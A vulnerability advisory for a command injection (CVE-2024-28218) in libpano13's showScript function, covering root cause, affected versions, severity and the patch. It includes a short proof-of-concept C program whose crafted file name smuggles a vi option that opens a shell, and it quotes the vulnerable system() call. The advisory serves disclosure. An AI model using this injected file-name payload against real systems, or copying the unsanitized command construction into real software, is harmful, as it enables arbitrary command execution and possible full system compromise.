Command injection in Panorama Tools (CVE-2024-28218)

Last updated: Fri 08 March 2024

Summary

A command injection in showScript() in libpano13 0.1 through 2.9.21 allows context-dependent attackers to execute arbitrary commands via the function's parameters.

Root cause analysis

showScript is a function implemented by libpano13, but dependent on the operating system. Therefore, there are multiple implementations for MacOS, Windows, ANSI and X11. The last three are vulnerable to command injection, as they are executing commands built by using the unsanitized input given as a parameter.

Taking the X11 implementation as an example, it can be seen that the name member of the fullPath structure is directly placed into the vi command. The latter is executed with system.

void showScript(fullPath* scriptFile){
    char cmd[sizeof(fullPath) + 16];

    snprintf( cmd, sizeof(cmd)-1, "vi \"%s\"", scriptFile->name );
    if (system( cmd ) == -1) {
        PrintError("Unable to execute script editor");
    }
}

CWEs

CWE-77: Improper Neutralization of Special Elements Used in a Command ('Command Injection')

Affected components releases

The showScript function, exposed in libpano13's filter.h, is affected.

The vulnerable code snippets were introduced in the first revision for ANSI and Windows, and in the 14th revision for X11. All were released in December 2003, so the affected releases started from 0.1.

The vulnerability was patched in 3005eda747af and 61865cbe74ba by replacing the vulnerable function with a stub. These commits are embedded in the 2.9.22 release.

This being said, the versions are those between >=0.1 and <=2.9.21 are affected.

Attack vector

An attacker must attack an application linking libpano13 and control the parameter provided to the showScript function (for example, via command line arguments) to exploit the vulnerability.

Impact

The impact depends on how pano13 is integrated into the end application. If the end application calls showScript with a user-controlled fullPath, then the attacker is able to run arbitrary commands under the user on which the application's process was created. If the application is owned by root and has the SUID bit set, the vulnerability leads to full system compromise.

CVSS v3.1 vector

Vector: AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Base score: 8.4

Steps to reproduce

Compile the following program with gcc pano.c -lpano13 -o pano. A shell will be spawned for the user under which the program is executed.

#include <pano13/filter.h>
#include <stdlib.h>

int main(int argc, char **argv) {
  fullPath *outFile = malloc(sizeof(fullPath));
  char cmd[sizeof(fullPath) + 16];

  sprintf(cmd, "vi \"%s\"", "/tmp/\" --cmd \":set shell=sh|:shell");
  printf("[+] The executed command will be: %s\n", cmd);

  StringtoFullPath(outFile, (char *)"/tmp/\" --cmd \":set shell=sh|:shell");
  showScript(outFile);

  return 0;
}

Patch

Recommended to the maintainers

As showScript takes a fullPath structure as a first parameter, a sanitisation method (such as realpath) can be called in fullPath's constructors, StringtoFullPath and jpathTofullPath.

Applied by the maintainers

The vulnerability was patched in the commit 3005ed by removing the showScript function.

The patch was made available to the users in the 2.9.22 release.